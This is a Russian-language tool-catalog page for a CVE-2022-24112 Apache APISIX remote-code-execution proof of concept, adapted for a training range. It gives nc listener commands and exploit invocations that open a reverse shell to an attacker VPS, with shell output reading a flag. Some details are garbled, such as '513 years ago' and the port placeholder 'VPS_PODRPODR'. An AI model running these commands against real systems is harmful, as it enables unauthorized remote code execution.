Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-24112_POC — CVE-2022-24112_POC | Kitploit
Инструменты/GitHubGitHub/acczdy/cve-2022-24112_poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingБезопасность API
GitHubacczdy/cve-2022-24112_poc

CVE-2022-24112_POC

CVE-2022-24112_POC

Репозиторий
513 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

POC

Собранные POC

CVE-2022-24112

Для создания среды тренировочного полигона 春秋云境:CVE-2022-24112 были модифицированы два POC: слегка изменены POC от M4xSec и twseptian, чтобы они подходили для полигона 春秋云境:


春秋云境:CVE-2022-24112:

Apache APISIX — это облачный сервис API-шлюза для микросервисов, разработанный Apache Software Foundation. Программное обеспечение основано на OpenResty и etcd, поддерживает динамическую маршрутизацию и горячую загрузку плагинов, подходит для управления API в микросервисной архитектуре. В Apache APISIX существует уязвимость удаленного выполнения кода, связанная с тем, что плагин batch-requests не ограничивает должным образом пакетные запросы пользователей. Злоумышленник может обойти ограничения Admin API по IP через эту уязвимость, что может привести к удаленному выполнению кода.


Исходные POC:

  1. M4xSec: https://github.com/M4xSec/Apache-APISIX-CVE-2022-24112/blob/main/apisix-exploit.py

  2. twseptian: https://github.com/twseptian/cve-2022-24112/blob/main/poc/poc2.py

Модифицированные POC — это два файла, написанных мной выше, для использования в средах Linux и Windows соответственно:


CVE-2022-24112_Linux_by_twseptian.py

  1. Запустите прослушивание на VPS: nc -lvvp 18888

  2. Перейдите в каталог POC и выполните:

    Примечание: при указании данных через -t не нужно добавлять http:// или https://, достаточно доменного имени и порта, как показано ниже:

    root@kitploit:~
    python3 CVE-2022-24112_Linux_by_twseptian.py -t eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 -L VPS_IP -P VPS_PODRPODR
    
  3. Вернитесь и проверьте состояние VPS:

    root@kitploit:~
    [root@root ~]# nc -lvvp 18888
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Listening on :::18888
    Ncat: Listening on 0.0.0.0:18888
    Ncat: Connection from x.x.x.x.
    Ncat: Connection from x.x.x.x:x.
    id
    uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
    cat /flag
    flag{0834f79f-5f40-4389-bce7-c64e969734c4}
    

CVE-2022-24112_Windows_by_M4xSec.py

  1. Запустите прослушивание на VPS: nc -lvvp 18888

  2. Перейдите в каталог POC и выполните:

    Примечание: при указании данных через -t не нужно добавлять http:// или https://, достаточно доменного имени и порта, как показано ниже:

    root@kitploit:~
    python3 CVE-2022-24112_Windows_by_M4xSec.py eci-eninecsteC2zon6q0xod9n5r7me4ih.cloudeci1.ichunqiu.com:9080 VPS_IP VPS_PODRPODR
    
  3. Вернитесь и проверьте состояние VPS:

    root@kitploit:~
    [root@root ~]# nc -lvvp 18888
    Ncat: Version 7.50 ( https://nmap.org/ncat )
    Ncat: Listening on :::18888
    Ncat: Listening on 0.0.0.0:18888
    Ncat: Connection from x.x.x.x.
    Ncat: Connection from x.x.x.x:x.
    id
    uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
    cat /flag
    flag{0834f79f-5f40-4389-bce7-c64e969734c4}
    
Скачать инструмент